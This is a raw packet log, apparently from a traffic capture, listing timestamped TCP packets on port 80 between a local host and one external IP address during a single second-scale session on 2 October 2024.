Oct 2, 2024 09:41:26.136421919 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136430025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136437893 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136447906 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136462927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.136493921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.136571884 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136580944 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136589050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136596918 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136605978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136620045 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136625051 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.136629105 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136637926 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136646032 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136655092 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136662960 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136670113 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136678934 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136699915 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.136699915 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.136713982 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.136939049 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136946917 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136955976 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136964083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136974096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136981964 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136990070 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.136998892 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137012959 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137021065 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137028933 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137037992 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137046099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137048960 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.137048960 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.137048960 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.137048960 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.137048960 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.137054920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137068033 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137135029 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.137135029 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.137326956 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137336016 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137345076 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137351990 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137361050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137370110 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137378931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137397051 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.137397051 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.137466908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137476921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137485027 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137492895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137501955 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137510061 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137517929 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137526989 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137535095 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137542963 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137552023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.137574911 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.137574911 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.137574911 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.137574911 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.137650967 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.221911907 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.221956968 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.222012043 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.222044945 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.222076893 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.222109079 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.222141027 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.222191095 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.222194910 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.222194910 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.222194910 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.222196102 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.222196102 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.222196102 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.222240925 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.222290039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.222321033 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.222352982 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.222383976 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.222414970 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.222417116 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.222417116 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.222417116 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.222417116 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.222445011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.222477913 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.222505093 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.222537994 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.222569942 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.222600937 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.222631931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.222650051 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.222650051 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.222650051 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.222650051 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.222650051 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.222650051 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.222662926 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.222697020 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.223324060 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.223355055 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.223360062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.223360062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.223360062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.223414898 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.223414898 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.223428965 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.223460913 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.223509073 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.223540068 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.223573923 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.223619938 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.223668098 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.223714113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.223714113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.223714113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.223714113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.223714113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.223715067 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.223747969 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.223779917 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.223828077 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.223859072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.223890066 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.223921061 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.223952055 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.223963976 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.223963976 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.223963976 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.223963976 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.223963976 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.223963976 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.223983049 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.224020958 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.224050999 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.224081993 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.224112988 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.224143982 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.224155903 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.224155903 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.224155903 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.224155903 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.224155903 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.224155903 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.224175930 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.224208117 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.224239111 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.224271059 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.224855900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.224855900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.224855900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.224855900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.224855900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.285604000 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.290694952 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.461803913 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.461822987 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.461834908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.461847067 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.461858034 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.461889982 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.461889982 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.461919069 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.461929083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.461993933 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.461993933 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.462023973 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462034941 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462045908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462055922 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462066889 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462119102 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.462119102 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.462119102 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.462167025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462177992 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462188005 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462198019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462207079 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462217093 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462228060 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462238073 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462246895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462275982 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.462275982 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.462275982 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.462275982 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.462356091 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462385893 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462397099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462421894 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.462421894 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.462450981 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462461948 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462471962 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462482929 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462492943 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462524891 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.462524891 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.462524891 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.462555885 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462565899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462596893 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.462596893 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.462666988 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462677002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462687016 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462697983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462707996 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.462724924 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.462724924 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.462768078 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.462768078 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.464139938 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464148998 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464190006 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.464224100 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464235067 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464245081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464255095 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464313984 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.464314938 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.464355946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464366913 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464376926 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464387894 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464399099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464478970 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.464478970 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.464479923 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.464499950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464509964 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464519978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464533091 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464608908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464618921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464629889 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464638948 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464649916 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464669943 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.464669943 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.464669943 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.464670897 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.464670897 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.464670897 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.464714050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464726925 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464742899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464752913 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464765072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464786053 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464828014 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.464828014 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.464828014 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.464828968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.464828968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.464860916 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464870930 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464881897 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464893103 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464903116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464948893 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.464948893 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.464948893 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.464975119 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464986086 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.464996099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465008020 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465038061 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.465038061 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.465065002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465075970 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465086937 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465096951 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465122938 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.465122938 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.465122938 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.465181112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.465219975 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465229988 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465240002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465250969 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465261936 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465305090 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465367079 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.465367079 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.465367079 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.465396881 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465406895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465416908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465428114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465439081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465449095 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465460062 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465502024 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.465502024 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.465502024 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.465502024 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.465617895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465627909 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465636969 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465647936 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465656996 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465667009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465677023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465686083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465696096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465707064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465735912 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.465735912 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.465735912 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.465737104 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.465754986 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.465828896 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465838909 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465850115 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465858936 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465874910 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.465929031 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465939999 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465950012 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465961933 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.465989113 CEST	49749	80	192.168.2.4	46.8.231.109
